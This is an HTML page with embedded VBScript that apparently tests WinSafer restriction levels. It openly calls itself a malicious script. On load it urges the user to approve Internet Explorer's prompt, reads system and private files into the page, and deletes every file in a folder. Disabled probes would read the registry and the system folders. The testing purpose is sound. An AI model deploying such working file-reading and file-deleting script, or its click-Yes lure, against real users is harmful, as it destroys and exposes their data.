<html>
<head>
<title>Example WinSafer Html script</title>
</head>
<body>
<h1>Example WinSafer Html script</h1>
<script language="vbscript">
rem Shown while the page loads, before the second script block further down
rem the page runs. That block calls CreateObject("Scripting.FileSystemObject").
rem NOTE(review): the "question" is presumably the confirmation Internet
rem Explorer raises before a page script may create such an object -- confirm.
msgbox("Hello friend, please press 'Yes' when Internet Explorer asks you a question!")
</script>
<table bgcolor="#cccc99" border=3>
<tr><th>Script output is below:</th></tr>
<tr><td bgcolor="#eeeeaa">
<script language="vbscript">
Option Explicit

rem Fixed targets this example page probes. Each probe writes its outcome
rem (success or the error text) into the surrounding table cell, so the page
rem shows which operations the script was allowed to perform.
rem NOTE(review): presumably meant to be run under different WinSafer levels
rem and the outputs compared -- confirm against the accompanying test notes.
const filename1 = "c:\boot.ini"
const filename2 = "e:\secret.txt"
const foldername1 = "e:\spam"

dim probeTarget

document.write("Howdy. I am a malicious script.<br>")
document.write("<hr>")

rem File-read probes, each followed by a horizontal rule.
for each probeTarget in Array(filename1, filename2)
    ReadTheFile probeTarget
    document.write("<hr>")
next

rem Optional probes, disabled in this version of the page.
rem call DisplaySpecialFolders
rem document.write("<hr>")
rem call ReadTheRegistry
rem document.write("<hr>")

rem File-delete probe against the scratch folder.
DeleteFiles foldername1
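sub ReadTheRegistry
    rem Registry-read probe: tries to read one value under HKEY_CURRENT_USER
    rem through WScript.Shell and writes either the value or the failure
    rem reason into the page.
    rem
    rem Every step is checked so the page distinguishes "object creation was
    rem refused" from "the read was refused". Without the checks a blocked read
    rem and a script bug produce the same empty output, which makes the probe
    rem useless as evidence that a restriction is in force.
    On error resume next
    dim wscr, rr

    Err.Clear
    set wscr = CreateObject("WScript.Shell")
    if (Err.Number <> 0) then
        document.write("I failed to create WScript.Shell: " & Err.Description & "<br>")
        exit sub
    end if

    rem RegRead returns the value data, not an object reference, so it must be
    rem a plain assignment. Using "set" here raises "Object required", which
    rem On Error Resume Next would hide, leaving rr empty.
    rr = wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EmailName")
    if (Err.Number <> 0) then
        document.write("I failed to read the registry: " & Err.Description & "<br>")
        exit sub
    end if

    rem The value is data from outside the page; encode it so it is displayed
    rem as text instead of being parsed as markup.
    rr = Replace(rr, "&", "&amp;")
    rr = Replace(rr, "<", "&lt;")
    rr = Replace(rr, ">", "&gt;")
    document.write("Read the registry: " & rr)
end sub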
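Sub ReadTheFile(filename)
    rem File-read probe: tries to open <filename> for reading through
    rem Scripting.FileSystemObject and writes either the file's text or the
    rem failure reason into the page.
    rem
    rem filename - path to read; the callers in this page pass fixed constants.
    rem
    rem Each step is checked separately so the output tells apart a refused
    rem object creation, a refused open and a failed read.
    On error resume next
    dim fso, fileinput, linetext

    Err.Clear
    Set fso = CreateObject("Scripting.FileSystemObject")
    if (Err.Number <> 0) then
        document.write("I failed to create Scripting.FileSystemObject: " & Err.Description & "<br>")
        exit sub
    end if

    rem Second argument 1 opens the file for reading.
    set fileinput = fso.OpenTextFile(filename,1)
    if (Err.Number <> 0) then
        document.write("I failed to open the file <B>" & filename & "</B> for reading: " & Err.Description & "<br>")
        exit sub
    end if

    rem ReadAll raises "Input past end of file" on an empty file, so only call
    rem it when there is something to read.
    linetext = ""
    if not fileinput.AtEndOfStream then
        linetext = fileinput.ReadAll
    end if
    if (Err.Number <> 0) then
        document.write("I failed to read the file <B>" & filename & "</B>: " & Err.Description & "<br>")
        fileinput.Close
        exit sub
    end if
    fileinput.Close

    rem The file's text is data, not part of this page. Encode it before
    rem writing it out; otherwise a file containing markup (for example a
    rem closing </pre> followed by a script element) would be parsed and run
    rem in the page instead of being displayed.
    linetext = Replace(linetext, "&", "&amp;")
    linetext = Replace(linetext, "<", "&lt;")
    linetext = Replace(linetext, ">", "&gt;")

    document.write("I just read the file <B>" & filename & "</B> and it contained:<br><pre>" & linetext & "</pre><br>")
End Sub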
Sub DeleteFiles(foldername)
    rem File-delete probe: lists the files returned by Folder.Files for
    rem <foldername>, tries to delete each one, and writes the per-file outcome
    rem into the page as an HTML list.
    rem
    rem foldername - folder whose files are deleted; the caller in this page
    rem              passes the constant foldername1.
    rem
    rem Errors never abort the sub: On Error Resume Next is in effect and each
    rem step is followed by an Err.Number test that writes the failure text.
    On error resume next
    dim fso, Folder, Files, File, filecount
    rem NOTE(review): a failure of CreateObject is not reported on its own.
    rem Err.Clear below runs after it, so a refused object creation shows up
    rem as the GetFolder failure message instead.
    Set fso = CreateObject("Scripting.FileSystemObject")
    document.write("<ul>")
    document.write("<li>Going to delete all files from " & foldername)
    Err.Clear
    set Folder = fso.GetFolder(foldername)
    if (Err.Number <> 0) then
        document.write("<li>Failed to access <B>" & foldername & "</b>: " & Err.Description)
    else
        rem VBScript identifiers are case-insensitive: "files" is the variable
        rem declared as "Files" above.
        set files = Folder.Files
        if (Err.Number <> 0) then
            document.write("<li>Failed to access <B>" & foldername & "</b>: " & Err.Description)
        else
            filecount = Files.Count
            if Err.Number <> 0 then
                document.write("<li>Failed to access folder: " & Err.Description)
            else
                document.write("<li>There are " & CStr(filecount) & " files within <b>" & foldername & "</b>")
                for each File in Files
                    rem Reset Err so the test below reflects this file only.
                    Err.Clear
                    document.write("<li>" & File.Path)
                    rem NOTE(review): this branch fires when reading File.Path
                    rem or writing the list item failed; no delete has been
                    rem attempted yet, so the message text is misleading.
                    if (Err.Number <> 0) then
                        document.write("<li>Failed to delete files: " & Err.Description)
                    else
                        Err.Clear
                        FSO.DeleteFile(File.Path)
                        rem The outcome is appended to the list item opened above.
                        if (Err.Number <> 0) then
                            document.write(": failed to delete, " & Err.Description)
                        else
                            document.write(": <B>successfully deleted!!</B>")
                        end if
                    end if
                Next
            end if
        end if
    end if
    document.write("</ul>")
end sub
sub DisplaySpecialFolders
    rem Special-folder probe: asks Scripting.FileSystemObject for the three
    rem special folders (ids 0, 1 and 2) and writes each result into the page.
    rem No step is checked; with On Error Resume Next a lookup that fails
    rem leaves its variable empty and the corresponding line shows no path.
    On error resume next

    const WINDOWS_FOLDER_ID = 0
    const SYSTEM_FOLDER_ID = 1
    const TEMPORARY_FOLDER_ID = 2

    dim fileSys, winFolder, sysFolder, tmpFolder
    Set fileSys = CreateObject("Scripting.FileSystemObject")

    rem All three lookups happen before anything is written.
    Set winFolder = fileSys.GetSpecialFolder(WINDOWS_FOLDER_ID)
    Set sysFolder = fileSys.GetSpecialFolder(SYSTEM_FOLDER_ID)
    Set tmpFolder = fileSys.GetSpecialFolder(TEMPORARY_FOLDER_ID)

    document.write("Your Windows directory is: " & winFolder & "<br>")
    document.write("Your System directory is: " & sysFolder & "<br>")
    document.write("Your Temporary directory is: " & tmpFolder & "<br>")

    rem Observation from the original author: when the script runs at an
    rem untrusted level, it cannot determine the user's personal temporary
    rem directory.
end sub
</script>
</td></tr></table>
</body>
</html>